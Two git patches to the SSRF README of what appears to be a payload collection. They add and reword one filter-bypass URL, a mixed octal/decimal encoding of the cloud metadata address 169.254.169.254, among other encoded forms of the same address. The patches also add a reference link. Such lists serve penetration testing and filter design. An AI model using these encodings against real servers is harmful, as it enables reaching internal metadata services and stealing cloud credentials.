From 3c441669d81f187edd5be0884eb42238ceef6ead Mon Sep 17 00:00:00 2001
From: Aj Dumanhug <ajdumanhug@users.noreply.github.com>
Date: Sun, 13 Mar 2022 01:30:37 +0800
Subject: [PATCH 1/2] Update README.md

---
 Server Side Request Forgery/README.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index ed8dd5ca..bb0d667e 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -573,6 +573,7 @@ http://0xA9FEA9FE/ Dotless hexadecimal
 http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
 http://0251.0376.0251.0376/ Dotted octal
 http://0251.00376.000251.0000376/ Dotted octal with padding
+http://0251.254.169.254 Encode 1 octet of the IP address or 2 or 3 (Just don't encode all)
 ```
 
 More urls to include
@@ -856,3 +857,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
 - [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/)
 - [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html)
 - [Attacking Url's in JAVA](https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/)
+- [SSRF: Don't encode entire IP](https://twitter.com/thedawgyg/status/1224547692967342080)

From 8d609b1460c68fa7f4c298688684e8f0d4b791f8 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Tue, 6 Sep 2022 23:15:12 +0200
Subject: [PATCH 2/2] Update README.md

---
 Server Side Request Forgery/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index bb0d667e..3a885342 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -573,7 +573,7 @@ http://0xA9FEA9FE/ Dotless hexadecimal
 http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
 http://0251.0376.0251.0376/ Dotted octal
 http://0251.00376.000251.0000376/ Dotted octal with padding
-http://0251.254.169.254 Encode 1 octet of the IP address or 2 or 3 (Just don't encode all)
+http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal)
 ```
 
 More urls to include